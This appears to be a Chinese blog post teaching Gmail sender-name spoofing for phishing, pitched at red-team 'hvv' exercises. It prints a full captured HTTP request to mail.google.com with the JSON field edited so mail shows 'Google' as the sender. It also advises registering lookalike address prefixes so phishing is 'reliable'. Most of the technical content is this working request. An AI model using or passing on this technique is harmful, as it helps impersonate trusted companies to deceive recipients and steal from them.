文章来源: 辛巴大佬
各位绿帽小伙伴们,听说hvv快到了,钓鱼的日子也快来了,今天给大家带了gmail钓鱼的方法。
因为谷歌的一些限制,我们注册的时候,并不能注册一些特殊用户名,比如加入特殊字符和注册Google等等,
但是可以通过绕过谷歌限制,将邮件发送人的名字准确的改为:“Google” “Apple”等等官方。
概念证明:
绕过限制:
在发送邮件的时候抓包。
POST /sync/u/0/i/s?hl=zh-CN&c=22 HTTP/2
Host: mail.google.com
Cookie: COMPASS=x x x x x x x x x x x x x x x x x x x x x x x x x
Content-Length: 656
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
X-Framework-Xsrf-Token: xxxxxxxxxxxxxxxxxxxxx
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/json
X-Google-Btd: 1
X-Gmail-Btai: {"3":{"6":0,"10":1,"13":1,"15":0,"16":1,"17":1,"18":0,"19":1,"22":1,"23":1,"24":1,"25":1,"26":1,"27":1,"28":1,"29":0,"30":1,"31":1,"32":1,"33":1,"34":1,"35":0,"36":1,"37":"zh-CN","38":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36","39":1,"40":0,"41":25,"43":0,"44":1,"45":0,"46":1,"47":1,"48":1,"49":1,"50":1,"52":1,"53":1,"54":0,"55":1,"56":1,"57":0,"58":0,"60":0,"61":1,"62":0,"63":1,"64":1,"66":1,"67":1,"69":1,"70":0,"71":1,"72":0,"73":1},"5":"cef43d678f","7":25,"8":"gmail.pinto-server_20220225.06_p1","9":1,"10":5,"11":"","12":28800000,"13":"+08:00","14":1,"16":431522263,"17":"","18":"","19":"xxxxxxxxxxxxxxx","21":"11874"}
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://mail.google.com
X-Client-Data: xxxxxxxxxxxxxxxxxxx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mail.google.com/mail/u/0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
{"2":{"1":[{"1":"5","2":{"1":"thread-a:r-xxxxxxxxxxx","2":{"14":{"1":{"1":"msg-a:r-xxxxxxxxxxx","2":{"1":1,"2":"[email protected]","3":"google","10":"[email protected]"},"3":[{"1":1,"2":"收件人@qq.com"}],"7":"xxxxxx","8":"hack by xinba","9":{"2":[{"1":0,"2":"<div dir=\"ltr\">1234</div>"}],"7":1},"11":["^all","^pfg","^f_bt","^f_btns","^f_cl","^a"],"18":"xxxxxxxxxxx","36":{"6":0},"37":{"4":0},"42":0,"43":{"1":0,"2":0,"3":0,"4":0},"52":"s:xxxxxxxxx|#msg-a:r-952505133084427487|0"},"3":1}}}}]},"3":{"1":1,"2":"11874","5":{"2":0},"7":1},"4":{"1":"xxxxxxxx","2":1,"3":"xxxxxxxxx","4":1,"5":70},"5":2}
看看效果,对比一下真实的Apple和QQ阅读的邮件,顺便说一句,我用的qq邮件接收的,最上面的Google是我们刚刚伪造发送的邮件。
在重新注册一个email邮箱,在邮箱的前缀上面做点文章,钓鱼稳当可靠。
谢谢各位,如果还想看到以后的更新,请大家点点关注。
多一个点在看
多一条小鱼干